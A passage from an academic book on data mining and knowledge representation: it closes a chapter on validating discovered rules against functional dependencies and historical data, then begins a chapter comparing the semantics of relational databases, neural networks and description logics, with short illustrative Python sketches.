can be used (Adriaans & Zantinge, 1996). The chance of having complete/incomplete knowledge discovery depends on the discovery process. If the knowledge discovery process uses the universal relation, then we could provide maximum guarantee that potentially interesting statistical dependencies are preserved. In the case of normalized relations, it depends on how the discovery process is performed on multiple relations. For instance, if the discovery process works on relations independently, then we may never discover a relationship between Average House Price and the Product Purchased in the relations of Figure 3. For validating the completeness/incompleteness of the discovered knowledge, we propose to analyze the discovered rules (known as statistical dependencies) with the available functional dependencies (known as domain knowledge). If new dependencies are generated that are not in the set of discovered rules, then we have an incomplete knowledge discovery. For example, processing the Sales relation in Figure 3, we may discover that if Zip Code = 11111 then Product Purchased = Wine with some confidence. We call this a statistical dependency that indicates a correlation (with some confidence) between the Zip Code and the Product Purchased by people. Now, consider the Region
relation in Figure 3, where the given dependencies are Zip Code → City and City → Average House Price, which give the derived new functional dependency Zip Code → Average House Price due to the transitive dependency. By looking at the discovered statistical dependency and the newly derived dependency (or a given dependency in general), one may deduce a relationship between the Average House Price and the Product Purchased (with some confidence). If our discovery process does not generate such a relationship, then we have an incomplete knowledge discovery that is the consequence of working on normalized relations as opposed to universal relations. The main issue in the validation process is then to generate all the statistical dependencies. Foreign key detection algorithms used in reverse engineering of databases, along with a special query mechanism, can be used to detect statistical dependencies (Adriaans & Zantinge, 1996). As we noted, to provide maximum guarantee that potentially interesting statistical dependencies are preserved, the knowledge discovery process should use the universal relation (Chiang et al., 1994) as opposed to normalized relations. However, we should be careful when processing a universal relation since it could mistakenly lead to discovering a known fact (i.e., a func-
tional dependency, or FD). Note that, when we denormalize the relations (join them) to create the universal relation, we will have redundancies due to the functional dependencies among attributes. For example, consider the universal relation Sales/Regions in Figure 4. A discovery system may discover that:
1. If Zip Code = 11111 Then City = Paris
2. If City = Paris Then AverageHousePrice = High
The above rules indicate relationships between Zip Code and City, and between City and AverageHousePrice. These relationships, however, do not represent new discoveries since they are in fact the given functional dependencies, which are true.
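A simple safeguard (sketched below by us; the FD closure step is limited to transitivity for brevity) is to compare each discovered statistical dependency with the given functional dependencies and their transitive consequences, and to discard those that merely restate a known FD.

```python
# Sketch: discarding "discovered" rules that only restate given functional
# dependencies (or their transitive consequences).  Only transitivity is
# applied here; a full FD closure would use Armstrong's axioms.

def transitive_closure(fds):
    """fds: set of (lhs, rhs) attribute pairs, e.g. ('Zip Code', 'City')."""
    closure = set(fds)
    changed = True
    while changed:
        changed = False
        for (a, b) in list(closure):
            for (c, d) in list(closure):
                if b == c and (a, d) not in closure:
                    closure.add((a, d))
                    changed = True
    return closure

given_fds = {("Zip Code", "City"), ("City", "Average House Price")}
known = transitive_closure(given_fds)
print(("Zip Code", "Average House Price") in known)   # True (derived FD)

# Discovered statistical dependencies as (antecedent_attr, consequent_attr):
discovered = [("Zip Code", "City"),                    # restates a given FD
              ("Zip Code", "Product Purchased"),       # genuinely new
              ("Average House Price", "Product Purchased")]
new_rules = [r for r in discovered if r not in known]
print(new_rules)
```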
USING HISTORICAL DATA FOR KNOWLEDGE DISCOVERY
Knowledge discovery from operational/detailed or summary data alone may not reveal trends and long-term patterns in data. Historical data should be an essential part of any discovery system in order to discover patterns that are correct over data gathered for a number of years as well as the current data. For example, we may discover from current data a pattern indicating an increase in student enrollment in the universities in the Washington, DC area (perhaps due to a good economy). Such a pattern may not be true when we look at the last five years of data. There are several schemes for using historical data to improve the overall knowledge discovery process. In the following, we propose schemes that could help us to detect undiscovered patterns from detailed and summary data, and to validate the consistency/accuracy/completeness of the discovered patterns from the detailed/summary data.
1. Validate discovered knowledge from detailed/summary data against historical data: We can apply the discovered rules from detailed and/or summary data to the historical data to see if they hold. If the rules are strong enough, they should hold on the historical data. A discovered rule is inconsistent with the database if examples exist in the database that satisfy the condition part of the rule, but not the conclusion part (Giarrantanto & Riley, 1989; Keller, 1994). A knowledge base (i.e., a set of discovered rules from detailed and summary data) is inconsistent with the database if there is an inconsistent rule in the knowledge base. A knowledge base is incomplete with respect to the database if examples exist in the database that do not satisfy the condition part of any consistent rule. If there are inconsistent rules, we have some historical data that contradict the rules discovered from detailed/summary data. It means we may have anomalies in some of the historical data. This is the case where any knowledge from external data, a domain expert, and/or domain knowledge could be used to verify the inconsistencies. Similarly, if we have an incomplete knowledge base, some historical data could represent new patterns or some anomalies. Again, additional information (i.e., a domain expert) is necessary to verify that.
2. Compare the rules discovered from detailed/summary data with the ones from historical data: We perform the knowledge discovery on the historical data and compare the rules discovered from the historical data (call it H_RuleSet) with the ones discovered from detailed/summary data (call it DS_RuleSet). There are several possibilities:
a. If H_RuleSet ∩ DS_RuleSet = ∅, then none of the rules discovered from detailed/summary data hold on the historical data.
b. If H_RuleSet ∩ DS_RuleSet = X, then:
• If DS_RuleSet − X = ∅, then all of the rules discovered from detailed/summary data hold on the historical data.
• If X ⊂ DS_RuleSet, then there are some rules discovered from detailed/summary data that do not hold on the historical data (i.e., DS_RuleSet − X). We can find the data in the historical data that do not support the rules discovered from the detailed/summary data by finding the data that support the rules in DS_RuleSet − X and subtracting them from the entire historical data. This data can then be analyzed for anomalies.
c. If H_RuleSet − DS_RuleSet ≠ ∅ (or X ⊂ H_RuleSet), then there are some rules discovered from historical data that are not in the set of rules discovered from the detailed/summary data. This means we have discovered some new patterns.
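The set comparison in scheme 2 translates directly into code (our own sketch; rules are represented here as opaque strings, and the sample rule sets are invented):

```python
# Sketch: comparing the rules discovered from detailed/summary data
# (DS_RuleSet) with those discovered from historical data (H_RuleSet),
# following cases a, b, and c above.

def compare_rule_sets(h_rules, ds_rules):
    x = h_rules & ds_rules
    if not x:
        return "a: no detailed/summary rule holds on the historical data"
    if not (ds_rules - x):
        return "b: all detailed/summary rules hold on the historical data"
    report = ("b: these detailed/summary rules do not hold historically: "
              + ", ".join(sorted(ds_rules - x)))
    if h_rules - ds_rules:
        report += ("; c: new patterns found only in historical data: "
                   + ", ".join(sorted(h_rules - ds_rules)))
    return report

ds = {"Blue => NotProfitable", "SmallStore & GreenHat => Loss"}
h  = {"Blue => NotProfitable", "Weekend => HighSales"}
print(compare_rule_sets(h, ds))
```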
CONCLUSION AND FUTURE DIRECTION Current database technology involves processing a large volume of data in databases in order to discover new knowledge. Most of the knowledge discovery process has been on the operational (most recent) data. Knowledge discovery on just the detailed/recent data does not reveal all patterns that exist in the organizational data nor could it be consistent/accurate. We showed that rule discovery in operational relational databases could lead to incomplete and
inaccurate discovery. Relational databases are normalized in order to prevent update anomalies. In addition, operational databases contain mainly the most recent/detailed data. We need an environment where the detailed data as well as the summary and historical data are provided in order to have an effective discovery process. We showed how the discovered patterns from summary data can be used to validate the discovered patterns from the detailed operational data. Also, we described the process for using the discovered patterns from the historical data to validate the patterns discovered from the detailed/summary data. We have done some manual testing of the proposed schemes for detecting the anomalies on the discovered rules. The IDIS (2000) knowledge discovery tool was used on a PC on dataset related to the accident with fatality (we used the data available in the U.S. Department of Transportation). We used the detailed data as well as the summarized data. We should note that the IDIS tool discovered a lot of trivial, inaccurate, inconsistent rules on both the detailed and summarized data. We manually checked the results from the two sets of data. The initial results indicate that we are able to detect anomalies on the discovered rules using the schemes provided in this chapter. Once implemented, this validation tool can be connected to a discovery tool. Then, the generated rules from the discovery tool are given to our validation tool for further processing. The results from the validation tool can be made available to the discovery tool to refine its discovery process. There are several issues/concerns that need to be addressed before we could have an effective knowledge discovery process in databases. The following are some of the main issues. 1.
A major issue is the size of the databases, which are getting bigger and bigger (Chattratichat, Darlington, & Ghahem, 1997). The
larger a database, the richer its patterns; and as the database grows, the more patterns it includes. However, after a point, if we analyze “too large” a portion of a database, patterns from different data segments begin to dilute each other and the number of useful patterns begins to decrease (Parsaye, 1997). To find useful patterns in a large database, we could select segments of data that fit a particular discovery objective, prepare them for analysis, and then perform data discovery. As we segment, we deliberately focus on a subset of the data (i.e., a particular medication for a disease), sharpening the focus of the analysis. Alternatively, data sampling can be used for faster data analysis (Kivinen & Mannila, 1994). However, when we sample data, we lose information because we throw away data not knowing what we keep and what we ignore. Summarization may be used to reduce data sizes, although it can cause problems too, as we noted. Currently, we are trying to define criteria that one could use to manage the large volume of data in the KDD process.
2. Traditionally, most of the data in a database has come from internal operational systems such as order entry, inventory, or human resource data. However, external sources (i.e., demographic, economic, point-of-sale, market feeds, and Internet) are becoming more and more prevalent and will soon be providing more content to the data warehouse than the internal sources. The next question is how we process these external sources efficiently to retrieve relevant information and discover new knowledge that could explain the behavior of the internal data accurately. We are investigating this aspect of the KDD.
3. While promising, the available discovery schemes and tools are limited in many ways. A major restriction of these tools/techniques is that most of them operate on a single data relation to generate the rules. Many existing databases, however, are not stored as single relations, but as several relations for reasons of nonredundancy or access efficiency. For databases with several interrelated relations, the relevant data relations are to be joined in order to create a single relation, called a universal relation (UR) (Date, 2000; Maier, 1983). As we mentioned before, a UR could reveal more interesting patterns. However, from a data mining point of view, this could lead to many issues such as universal relations of unmanageable sizes, infiltration of uninteresting attributes, and inconveniences for distributed processing. Currently, we are considering the problem of knowledge discovery in multirelation databases (Ribeiro, Kaufman, & Kerschberg, 1995; Wrobel, 1997; Yoon & Kerschberg, 1993; Zhong & Yamashita, 1998).
4. Finally, current discovery tools, such as IDIS (2000), produce rules that are at times inaccurate, incomplete, inconsistent, and trivial. Our future plan is to study the implementation of the processes (algorithms) defined in this chapter for validating (or detecting) the consistency, accuracy, and completeness of the discovered rules.
REFERENCES Adriaans, P., & Zantinge, D. (1996). Data mining. Reading, MA: Addison-Wesley. Agrawal, R., Imielinski, T., & Swami, A. (1993). Database mining: A performance perspective. IEEE Transactions on Knowledge and Data Engineering, 5(6), 914-925. Barquin, R., & Edelstein, H. A. (1997). Building, using, and managing the data warehouse. Upper Saddle River, NJ: Prentice Hall PTR.
Berry, M., & Linoff, G. (2000). Mastering data mining. New York: John Wiley & Sons.
knowledge from volumes of data. Communications of the ACM, 39, 27-33.
Bischoff, J., & Alexander, T. (1997). Data warehouse: Practical advise from the expert. Upper Saddle River, NJ: Prentice Hall.
Fayyad, U., Piatetsky-Shapiro, G., & Symth, P. (1996b, August 2-4). Knowledge discovery and data mining: Towards a unifying framework. In Proceedings of the Second International Conference on Knowledge Discovery and Data Mining, Portland, OR (pp. 82-88).
Brachman, R. J., & Anand, T. (1996). The process of knowledge discovery in databases. In U. M. Fayyad, G. Piatetsky-Shapiro, & P. Symth (Eds.), Advances in knowledge discovery and data mining (pp. 37-57). Menlo Park, CA: AAAI Press/The MIT Press. Brachman, R. J., Khabaza, T., Kloesgen, W., Piatetsky-Shapiro, G., & Simoudis, E. (1996). Mining business databases. Communications of the ACM, 39, 42-28. Bradley, P., Gehrke, J., Ramakrishnan, R., & Srikant, R. (2002). Scalling mining algorithms to large databases. Communications of the ACM, 45(8), 38-43. Chattratichat, J., Darlington, J., & Ghahem, M. (1997, August 14-17). Large scale data mining: Challenges and responses. In Proceedings of the 3rd International Conference on Knowledge Discovery and Data Mining, Newport Beach, CA (pp. 143-146). Chiang, R. H. L., Barron, T. M., & Storey, V. C. (1994, July 31-August 4). Extracting domain semantics for knowledge discovery in relational databases. In Proceedings of the AAAI Workshop on Knowledge Discovery in Databases, Seattle, WA (pp. 299-310). Date, C. J. (2000). An introduction to database systems (7th ed.). Reading, MA: Addison-Wesley. Fayyad, U. (1996). Data mining and knowledge discovery: Making sense out of data. IEEE Expert, 11, 20-25. Fayyad, U., Piatetsky-Shapiro, G., & Symth, P. (1996a). The KDD process for extracting useful
Fayyad, U., Piatetsky-Shapiro, G., & Symth, P. (1996c). From data mining to knowledge discovery: An overview. In U. Fayyad, G. Piatetsky-Shapiro, & P. Symth (Eds.), Advances in knowledge discovery and data mining (pp. 1-34). Menlo Park, CA: AAAI/MIT Press. Fayyad, U., & Uthurusamy, R. (2002). Evolving data mining into solution for insights. Communications of the ACM, 45(8), 28-31. Frawley, W. J., Piatetsky-Shapiro, G., & Matheus, C. J. (1992). Knowledge discovery in databases: An overview. AI Magazine, 14(3), 57-70. Ganti, V., Gebrke, J., & Ramakrishnan, R. (1999). Mining very large databases. IEEE Computer, 32(8), 38-45. Giarrantanto, J., & Riley, G. (1989). Expert systems: Principles and programming. Boston: PWS-Kent Publishing Company. Groth, R. (1998). Data mining: A hands-on approach for business professionals. Englewood Cliffs, NJ: Prentice Hall. Han, J., & Kamber, M. (2000). Data mining: Concepts and techniques. San Francisco: Morgan Kaufmann. Hand, D., Mannila, H., & Smyth, P. (2001). Principles of data mining. Cambridge, MA: MIT Press. IDIS. (2000). The information discovery system user’s manual. Los Angeles: IntelligenceWare.
Inmon, W. H. (1996). The data warehouse and data mining. Communications of the ACM, 39, 49-50. John, G. H., & Langley, P. (1996, August 2-4). Static versus dynamic sampling for data mining. In Proceedings of the 2nd International Conference on Knowledge Discovery and Data Mining, Portland, OR (pp. 367-370). Keller, R. (1994). Expert system technology: Development and application. New York: Yourdon Press. Keyes, J. (1990, February). Branching to the right system: Decision-tree software. AI EXPERT, 61-64. Kivinen, J., & Mannila, H. (1994, May). The power of sampling in knowledge discovery. In Proceedings of the 1994 ACM SIGACT-SIGMOD-SIGACT Symposium on Principles of Database Theory (PODS’94), Minneapolis, MN (pp. 77-85). Maier, D. (1983). The theory of relational databases. Potamac, MD: Computer Science Press. Matheus, C. J., Chan, P. K., & Piatetsky-Shapiro, G. (1993). Systems for knowledge discovery in databases. IEEE Transactions on Knowledge and Data Engineering, 5(6), 903-913. Meredith, M. E., & Khader, A. (1996, June). Designing large warehouses. Database Programming & Design, 9(6), 26-30. Parsaye, K. (1996, September). Data mines for data warehouses. Database Programming & Design, 9(Suppl). Parsaye, K. (1997, February). OLAP & Data mining: Bridging the gap. Database Programming & Design, 10(2), 31-37. Parsaye, K. (1998, September). Small data, small knowledge: The pitfalls of sampling and summarization. Information Discovery Inc. Retrieved April 6, 2006, from http://www.datamining. com/datamine/ds- start1.htm
Parsaye, K., & Chignell, M. (1999). Intelligent database tools and applications: Hyperinformation access, data quality, visualization, automatic discovery. New York: John Wiley & Sons. Piatetsky-Shapiro, G. (1991). Discovery, analysis, and presentation of strong rules. Knowledge Discovery in Databases, 229-247. Menlo Park, CA: AAAI Press. Piatetsky-Shapiro, G., & Matheus, G. (1994, July). The interestingness of deviations. In Proceedings of the AAAI-94 Workshop on KDD, Seattle, WA (pp. 25-36). Ribeiro, J. S., Kaufman, K. A., & Kerschberg, L. (1995, June 7-9). Knowledge discovery from multiple databases. IASTED/ISMM International Conference, Intelligent Information Management Systems, Washington, DC. Sarawagi, S., Thomas, S., & Agrawal, R. (1998). Integrating association rule mining with relational database systems: Alternatives and implications. ACM SIGMOD Record, 27(2), 343-354. Savasere, A., Omiecinski, E., & Navathe, S. (1995). An efficient algorithm for mining association rules in large databases. In Proceedings of the 21st International Conference on Very Large Data Bases (pp. 432-444). San Fransisco: Morgan Kaufmann. Silberschatz, A., & Tuzhilin, A. (1995, August 20-21). On subjective measures of interestingness in knowledge discovery. In Proceedings of the 1st International Conference on Knowledge Discovery and Data Mining, Montreal, Quebec, Canada. Simoudis, E. (1996). Reality check for data mining. IEEE Expert, 11, 26-33. Smyth, P., Pregibon, D., & Faloutsos, C. (2002). Data driven evolution of data mining algorithms. Communications of the ACM, 45(8), 33-37.
Uthurusamy, R. (1996). From data mining to knowledge discovery: Current challenges and future directions. In U. M. Fayyad, G. PiatetskyShapiro & Symth, P. (Ed.), Advances in knowledge discovery and data mining (pp. 561-569). Menlo Park, CA: AAAI Press/The MIT Press. Wrobel, S. (1997). An algorithm for multi-relational discovery of subgroups. In J. Komorowsk &. J. Zytkow (Eds.), Principles of data mining and knowledge discovery (LNAI 1263, pp. 367-375). Springer-Verlag.
Yoon, J. P., & Kerschberg, L. (1993). A framework for knowledge discovery and evolution in databases. IEEE Transactions on Knowledge and Data Engineering, 5(6), 973-979.
Zhong, N., & Yamashita, S. (1998, May 27-30). A way of multi-database mining. In Proceedings of the IASTED International Conference on Artificial Intelligence and Soft Computing, Cancun, Mexico (pp. 384-387).
Ziarko, W. (1991). The discovery, analysis, and presentation of data dependencies in databases. Knowledge Discovery in Databases, 195-209. Menlo Park, CA: AAAI/MIT Press.
This work was previously published in Information Quality Management: Theory and Applications, edited by L. Al-Hakim, pp. 51-70, copyright 2007 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
Chapter 1.19
Approaches to Semantics in Knowledge Management Cristiano Fugazza University of Milan, Italy Stefano David Polytechnic University of Marche, Italy Anna Montesanto Polytechnic University of Marche, Italy Cesare Rocchi Polytechnic University of Marche, Italy
ABSTRACT
There are different approaches to modeling a computational system, each providing different semantics. We present a comparison among different approaches to semantics and we aim at identifying which peculiarities are needed to provide a system with uniquely interpretable semantics. We discuss different approaches, namely, Description Logics, Artificial Neural Networks, and relational database management systems. We identify classification (the process of building a taxonomy) as a common trait. However, in this chapter we also argue that classification is not enough to provide a system with semantics, which emerges only when relations among classes are established and used among instances. Our contribution also analyses additional features of the formalisms that distinguish the approaches: closed versus open world assumption, dynamic versus static nature of knowledge, the management of knowledge, and the learning process.
INTRODUCTION The growing demand for information and knowledge management is pushing research efforts in computer science towards the development of technologies that allow massive amounts of
data to be automatically processed and stored, for the user to dispose of them. In areas like SW (Semantic Web) applications, KR (Knowledge Representation), RDBMS (Relational Database Management Systems), and logic-based systems, research has led, during the last decade, to impressive advances in the creation and the implementation of applications that facilitate the management of knowledge. The availability of such an enormous amount of information also resulted in the necessity to develop systems with the ability to integrate information that originate from heterogeneous sources and organize them into a single source.1 On the one hand, these systems allow for not only data storage and retrieval, but also additional logic-based processing, like checking consistency of data; on the other hand, they require to combine different data storage systems (e.g., different database instances) or even different interpretation paradigms (e.g., relational calculus, logical formalisms, or the structure underlying neural networks). Particularly, the integration of heterogeneous data sources poses challenges when their storage systems differ in their underlying semantics, that is, when their logical interpretations do not adhere to the same paradigm. As an example, consider independent organizations collaborating in the EE (Extended Enterprise): the capability of combining into a single data source the data stored in a relational database and the axioms that constitute a KB (Knowledge Base) may represent a striking advantage on the market or industry. In this situation, before starting the integration process, it is necessary to have a clear sense of how to correctly join the semantics of the different sources. The purpose of this chapter is to introduce three popular approaches to knowledge representation, underpinned by different semantics, to show in what they differ, and to present two alternative approaches to the problem of information integration. Particularly, we will focus on the notion of semantics and on the different features that
contribute to the notion of semantics for each of the approaches described in this chapter. A good explanation of the concept of semantics in the various approaches requires some introductory knowledge of basic logical formalisms, like propositional and predicate logics. In order to explain how different can result the representation of the same domain and data in different formalisms, we define a sample scenario that will be developed and represented in the distinct formalisms in the next sections. This chapter is organized as follows. First, we describe a sample scenario that we will use to show differences among the chosen formalisms; then we present the formalisms, starting with elementary notions of propositional and predicate logic and, continuing with the introduction of some concepts in RDBMS, ANNs, and DLs theories. We accompany the theories with explanations on how to consider the features of each formalism and how they lead to different interpretations of the scenario. Finally, we describe two popular integration efforts among different formalisms, namely optimization of query answering in DLs, exploiting RDBMS storage with DL-Lite and OWA/CWA integration with hybrid reasoning.
A SAMPLE SCENARIO The scenario we will illustrate is the trading of goods; it involves companies, products, articles, markets, and consumers. We introduce these concepts in order to sketch our sample scenario; they will be represented in the different approaches with the addition of instance data to populate the schema. The main categorization defined by the example is the one distinguishing among different kinds of enterprises. A company is a generic entity that provides something (e.g., a service, a product, or another type of goods). Manufacturer, distributor, and reseller are further categorizations of company, while the concept suppliers
denotes the union of distributors and resellers. A product is produced by a manufacturer, is sold by a reseller, and is distributed in a specific market by a distributor. An article is a product which is made by the business entity under consideration (e.g., the manufacturer owning the knowledge base), as opposed to a generic, possibly competing, company. As for a generic product, an article has a name, a sale price, and it is distributed in a target market, a further categorization of market. Finally, a consumer is someone who buys an article. In the remainder of this chapter, it will be clear that not all approaches to data modeling can express these entities in such a way that, when executing queries over the KB, the result can be expected as correct. This is primarily due to the fact that traditional data structures (e.g., those expressed by relational databases all around the world) typically represent entities that can be exhaustively described and enumerated by the business entity hosting the system. Instead, wherever external data structures defined by third parties are instantiated in the KB, relational databases may fall short of expressing incomplete data structures in a consistent way.
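As a neutral starting point (our own sketch, prior to committing to any of the formalisms compared below), the scenario can be written down as a small class hierarchy with a few typed relationships; the class and attribute names follow the entities just described.

```python
# Sketch: the trading-of-goods scenario as a plain class hierarchy.
# How faithfully such a hierarchy captures the intended semantics is
# exactly what the comparison of RDBMS, ANN, and DL below is about.

class Company: ...
class Manufacturer(Company): ...
class Distributor(Company): ...
class Reseller(Company): ...
# "Supplier" is the union of distributors and resellers:
Supplier = (Distributor, Reseller)

class Market: ...
class TargetMarket(Market): ...

class Product:
    def __init__(self, name, producer, sold_by, distributed_in):
        self.name = name
        self.producer = producer              # a Manufacturer
        self.sold_by = sold_by                # a Reseller
        self.distributed_in = distributed_in  # a Market

class Article(Product):                       # a product made by "our" company
    def __init__(self, name, producer, sold_by, target_market, sale_price):
        super().__init__(name, producer, sold_by, target_market)
        self.sale_price = sale_price

acme = Manufacturer()
print(isinstance(acme, Company))    # True: classification by subclassing
print(isinstance(acme, Supplier))   # False: not asserted, hence "no" (a CWA-like reading)
```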
A PRIMER ON SEMANTICS OF DATA STRUCTURES Recently, there has been a growing interest in the notion of semantics. Probably pushed forward by the development of the SW, many researchers in computer science have (re)started investigating the field of semantics. Such a notion has been already widely investigated in many fields like linguistics, philosophy, and logic. Following the analytic stream as conceived in Russell (1908) and Frege (1918), the concept of semantics in philosophy evolved in formal terms until Montague provided a formalization (Montague, 1974), which is broadly accepted in the field of logic-based linguistic studies. In philosophy, a less formal trend brought to the definition of semantics in terms of
“correspondence to the world” (Wittgenstein), an approach influenced by the formal work of Tarsky about the notion of truth. Meanwhile, the work in cognitive psychology explored the human process of categorization and classification, which led to the development of models, inspired by formal models in logic, but more focused on representational issues (frames, etc.). In Balkenius and Gärdenfors (1991), the authors show that, by developing a high-level description of the properties of neural networks, it is possible to bridge the gap between the symbolic and the subsymbolic levels (Smolensky, 1993). We can make the connection between the approaches closer by providing a different interpretation of the structure of a neural network. Balkenius and Gärdenfors introduce the notion of schema as the key concept for this construction. A schema is neutral with respect to the different views of cognition and have been used in both fields (Balkenius, 1993). Moreover, Balkenius uses the term “schema” as a collective name for the structure used in the works of Piaget (1952), Piaget and Inhelder (1973), Rumelhart and McClelland (1986), and Arbib and Hanson, (1987), also including concepts such as Frames (Minsky, 1986) and Scripts (Schank & Abelson, 1977). Nowadays, the concept of semantics is involved in many research fields: natural language processing, Semantic Web, knowledge representation, and medical informatics. Our purpose is to analyse the notion of semantics in different approaches adopted in the design and implementation of computer systems. We consider three approaches to domain modeling: RDBMS, ANNs (Artificial Neural Networks), and DLs (Description Logic). RDBMS and DLs are grounded in the theory of propositional logic and its connectives: AND, OR, and NOT, with the addition of universal (∀x) and existential (∃x) quantification of variables from predicate logic, while some particular type of ANNs (McCulloch and Pitts, 1943) can express connectives of propositional logic. However, despite their common groundwork, these approaches
have evolved in different directions and are usually employed in fairly different application fields and with heterogeneous purposes. Research and discussion in the fields of RDBMS, ANN, and DL cannot abstract from the diverse notions of semantics they express. In this chapter, we closely look at each approach, highlighting peculiarities and common traits. After a brief introduction to the theoretical background of propositional and predicate logic, we first consider the relational approach of RDBMS , which allows fast retrieval of structured data via queries over tables. This approach, where data are organized in terms of homogeneous tuples (i.e., records with the same number and type of attributes), is by far the most widely adopted architecture for data storage. The second approach we consider is represented by ANN, which has a fairly different and peculiar approach to the modeling of a domain, exploiting a necessary initial learning phase in order to train the ability of the ANN to classify input data. Finally, DL is a well-known approach in the knowledge representation field and uses logic tools (subsumption, consistency, and satisfiability) to implement reasoning over structured data. Such an approach finds its roots in logical formalisms and exploits a clear definition of semantics, often expressed in terms of model theory. In order to compare the several approaches, we identified a small number of features that unequivocally determine the semantics conveyed by a specific representation formalism; specifically: •
• static versus dynamic nature of the structural description of data items (e.g., the relational schema in RDBMS);
• closed versus open world assumption when answering queries (i.e., considering the knowledge conveyed by the system as, respectively, complete or incomplete; illustrated in the sketch after this list);
• management of implicit knowledge (i.e., whether the system comprises knowledge not explicitly stated in its memory configurations);
• need for a learning phase;
• classification.
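The closed versus open world distinction in particular can be made concrete with a toy query evaluator (a sketch of ours, using the sample scenario): under the CWA a fact that is not stored is taken to be false, whereas under the OWA it is merely unknown unless its negation is stated.

```python
# Sketch: answering the query "is ACME Corp. a supplier?" under the
# closed world assumption (CWA) and the open world assumption (OWA).

facts = {("Manufacturer", "acme_corp")}        # what the KB explicitly states

def ask_cwa(predicate, individual):
    # Closed world: anything not stated (or derivable) is false.
    return (predicate, individual) in facts

def ask_owa(predicate, individual):
    # Open world: absence of the fact only means "unknown",
    # unless its negation is stated explicitly.
    if (predicate, individual) in facts:
        return True
    if ("not_" + predicate, individual) in facts:
        return False
    return None                                # unknown

print(ask_cwa("Supplier", "acme_corp"))        # False
print(ask_owa("Supplier", "acme_corp"))        # None (unknown)
```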
After introducing the distinct notions of semantics suggested by RDBMS, ANN, and DL, we will look at two examples of integration efforts between distinct approaches. Firstly, we claim that, in particular situations, even a well-designed RDBMS may fail to retrieve all the correct answers to a query. This happens because the semantics of the relational model is only capable of expressing complete (i.e., exhaustive) knowledge while some data structures are to be considered incomplete. On the other hand, the unparalleled performance of RDBMS when answering queries makes it difficult to implement DL systems that are equally fast. Trying to bridge this gap, we introduce a very simple DL that allows for taking advantage of RDBMS as the storage facilities, for instance data while retaining the open-world approach of DL to express incomplete data structures. Moreover, we will show that modern computer applications (especially those intended to manage data in the EE) quite often need to integrate the different interpretations of a knowledge base. Specifically, proprietary data structures that may be correctly expressed with RDBMS schemata are often extended with data structures defined and populated by third parties (e.g., individual companies in the EE scenario) that cannot be expressed by the relational model; on the contrary, only applications complying with the model-theoretic approach of DL (e.g., DL reasoners) can process this category of data structures correctly. Consequently, we tackle the problem of integrating distinct approaches into a hybrid system that is capable of processing both complete and incomplete knowledge.
KNOWLEDGE REPRESENTATION PARADIGMS AND ASSOCIATED SEMANTICS

Basic Logic Formalism

We introduce here some basic notions of logic formalisms. For more advanced reading, please refer to (Kelly, 1997).
Propositional Logic. Propositional logic is a formalism that allows one to assign a truth value to formulæ, which are structures composed of atomic propositions and connectives. An atomic proposition is basically a sentence, considered as a whole and not divisible, to which we want to assign a truth value. For example: ACME Corp. is a manufacturer. All products are sold in some market. Connectives are symbols that allow one to link propositions to build formulæ. The basic connectives are conjunction (AND) and disjunction (OR), which are binary operators, and negation (NOT), which is a unary operator. There are additional connectives in the theory of propositional logic (implication and equivalence), but since they can be expressed by means of the three basic connectives, we do not consider them here. A truth value is an assignment of truth, either "true" (T) or "false" (F), to an atomic proposition, that is, a declaration that the proposition is true or false. In order to evaluate the truth value of a formula, all statements and connectives must be evaluated. NOT inverts the truth value of the statement it is applied to; but how do we determine the truth value of a formula containing AND or OR connectives? The former assigns to the formula the value "true" if all the connected propositions are true, the latter if at least one of them is true. Propositional logic also allows for a basic reasoning service, called entailment or logical implication, which amounts to answering the following question: given a knowledge base Σ, which is a set of atomic propositions and/or formulæ, can a proposition α be derived from the knowledge base? If this happens, then Σ is also called a model of α, i.e., an interpretation that makes the formula true. Moreover, if the knowledge base admits at least one model, it is said to be satisfiable. In order to guarantee that reasoning does not produce wrong results, it should satisfy two properties:
1. Soundness: all propositions derived are true and no false proposition can be derived.
2. Completeness: all possible propositions that can be derived are given in output.
There are two main ways to check whether entailment (and, in general, any reasoning service) is sound and complete: 1) enumerating and evaluating all possible truth assignments of the knowledge base and of the derived statements; and 2) using tableaux calculus, a procedure that helps to constructively build a model for the knowledge base. The enumeration of all truth assignments of a knowledge base can become very long and complex if there are many statements: a single proposition has two truth assignments, two propositions have four truth assignments, and so on. In a generic knowledge base with n statements, there are 2^n possible truth assignments. Tableaux calculus, on the other hand, is based on the idea of incrementally building a model for the knowledge base, using rules to decompose formulæ into their components and to create a tree-like structure whose branches either end with a clash, which indicates that such a truth assignment contains contradictory statements (and is therefore not a model for the knowledge base), or are completed without clashes, meaning that the truth assignment is a model for the knowledge base.
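As a minimal illustration of the enumeration approach, the following Python sketch checks entailment by brute force over the 2^n truth assignments; the connective helpers and the atom names (manufacturer, sells_in_market) are ours and are not meant to model any particular logic library.

from itertools import product

def NOT(f):      return lambda v: not f(v)
def AND(f, g):   return lambda v: f(v) and g(v)
def OR(f, g):    return lambda v: f(v) or g(v)
def atom(name):  return lambda v: v[name]

def entails(kb, alpha, atoms):
    # Sigma entails alpha iff alpha is true in every truth assignment
    # (out of the 2^n possible ones) that makes every formula in Sigma true.
    for values in product([True, False], repeat=len(atoms)):
        v = dict(zip(atoms, values))
        if all(f(v) for f in kb) and not alpha(v):
            return False
    return True

m, s = atom("manufacturer"), atom("sells_in_market")
print(entails([AND(m, s)], m, ["manufacturer", "sells_in_market"]))  # True
print(entails([OR(m, s)], m, ["manufacturer", "sells_in_market"]))   # False: a disjunction entails neither disjunct

The exponential growth of the enumeration loop is exactly why constructive procedures such as tableaux are preferred in practice.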
Predicate Logic. In propositional logic it is possible to state whether an atomic proposition or a formula is true or false, but there is no way either to state the truth value of a set of statements or to describe the internal structure of an atomic proposition. In predicate logic, atomic propositions are expressed by means of relationships among objects of the domain, which opens new possibilities: describing the internal structure of an element and describing a set of elements by means of a common characteristic. In order to introduce some notions of predicate logic, consider the first statement in the example of the previous section, which can be expressed as: Manufacturer(acme_corp). There is no sentence here; the atomic statement whose truth we want to state is composed of a predicate (Manufacturer), which denotes a set of elements of the domain with the same characteristics, and a constant (acme_corp), which is a real element in the domain. Predicates and constants are two of the symbols that help build statements in predicate logic. Additional symbols are required in order to translate the second statement into a logic-based formalism: ∀x.(Product(x) → ∃y.(Market(y) ∧ isDistributedIn(x, y))). Note the writing conventions that we use: concept and property names are, respectively, capitalized and non-capitalized, with composite names rendered with medial capitals (Product, isDistributedIn). Individuals are always written lowercase, with an underscore in composite names (acme_corp). Unlike in propositional logic, the structure of the statement is not as easy to follow. This formula should be read "All x which 